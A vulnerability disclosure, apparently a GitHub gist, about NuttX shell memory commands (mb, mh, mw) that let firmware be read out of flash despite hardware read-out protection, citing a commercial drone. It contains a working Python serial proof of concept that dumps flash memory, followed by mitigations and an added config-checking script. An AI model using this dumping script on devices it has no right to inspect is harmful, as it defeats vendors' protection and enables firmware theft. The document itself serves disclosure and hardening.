Last active March 8, 2021 09:41
  • Save swkim101/f473b9a60e6d4635268402a2cd2025ac to your computer and use it in GitHub Desktop.

NSH's mb, mh, and mw commands are dangerous.

Exploiting those commands makes it possible to extract firmware from the flash memory, because mb, mh, and mw can read firmware code at an arbitrary address. Some commercial vendors customize their firmware without disclosing even the binary code. However, these commands neutralize the intellectual-property protection scheme that is meant to prevent the binary firmware from being read.

For instance, Yuneec, a commercial drone vendor, has sold multiple drone models such as the Typhoon H. The mb 0x8000000 command naively prints the Typhoon H's firmware binary code.
FYI, the drone vendor has made efforts to protect its firmware from being read out, applying ST's hardware read-out protection to its drones.
Nevertheless, NuttX's commands unintentionally help to bypass that protection scheme.

PoC is as follows:

import serial

# The serial port and baud rate were omitted from the original gist;
# the values below are PLACEHOLDERS to be replaced with the real ones.
ser = serial.Serial('/dev/ttyUSB0', 115200, timeout=1)  # PLACEHOLDER port/baud
f = open('output_db000.txt', 'wb')
for addr in range(0x080db000, 0x08200000, 0x1000):
    count = 0
    # "mw <hex-address> <hex-count>" with no value reads memory in 32-bit words
    ser.write(b'mw ')
    ser.write(bytes(hex(addr), 'ascii'))
    ser.write(b' 1000\r\n')
    while True:
        line = ser.readline()
        # a short line after the dump output is the NSH prompt: this block is done
        if len(line) <= 5 and count != 0:
            break
        f.write(line)
        count += 1
f.close()

If at all possible, we believe the best way to prevent this vulnerability is to remove the mb, mh, and mw commands. If that is not allowed for debugging purposes, we suggest the following actions to help protect intellectual property from this vulnerability:
(1) please add comments in the source code.
(2) please show warnings in compile messages.
(3) please disable those commands in the default configuration (CONFIG_NSH_DISABLE_MW=y)
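As an added example (not part of the gist), the check below is something a build pipeline can run against a NuttX .config to confirm that all three commands are compiled out. It assumes the companion Kconfig symbols CONFIG_NSH_DISABLE_MB and CONFIG_NSH_DISABLE_MH alongside the CONFIG_NSH_DISABLE_MW mentioned above; the two sample configs are constructed for the demonstration and are not real board configurations.

```shell
# Added example (not from the gist): verify that a NuttX .config disables the
# NSH memory-access commands. Returns 0 if all three are disabled, 1 otherwise.
check_nsh_mem_cmds_disabled() {
    cfg="$1"
    missing=""
    for opt in CONFIG_NSH_DISABLE_MB CONFIG_NSH_DISABLE_MH CONFIG_NSH_DISABLE_MW; do
        # Kconfig writes "CONFIG_X=y" when set; an unset option appears as
        # "# CONFIG_X is not set" or is absent entirely, so only "=y" passes.
        if ! grep -q "^${opt}=y$" "$cfg"; then
            missing="$missing $opt"
        fi
    done
    if [ -n "$missing" ]; then
        echo "NSH memory commands still enabled:$missing" >&2
        return 1
    fi
    return 0
}

# Constructed sample configs for the demonstration (not real board configs).
make_sample_configs() {
    dir="$1"
    # Weak: only mw is disabled; mb and mh still expose arbitrary memory reads.
    cat > "$dir/weak.config" <<'EOF'
CONFIG_NSH_LIBRARY=y
# CONFIG_NSH_DISABLE_MB is not set
# CONFIG_NSH_DISABLE_MH is not set
CONFIG_NSH_DISABLE_MW=y
EOF
    # Hardened: all three dump commands removed from the shell.
    cat > "$dir/hardened.config" <<'EOF'
CONFIG_NSH_LIBRARY=y
CONFIG_NSH_DISABLE_MB=y
CONFIG_NSH_DISABLE_MH=y
CONFIG_NSH_DISABLE_MW=y
EOF
}

# Usage: check_nsh_mem_cmds_disabled path/to/.config
tmp=$(mktemp -d)
make_sample_configs "$tmp"
check_nsh_mem_cmds_disabled "$tmp/weak.config" || echo "weak.config: FAIL (expected)"
check_nsh_mem_cmds_disabled "$tmp/hardened.config" && echo "hardened.config: OK"
```

The check is deliberately strict about the `=y` form so that a config which merely omits the symbol (which Kconfig treats as "not set") is reported as still exposing the commands.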
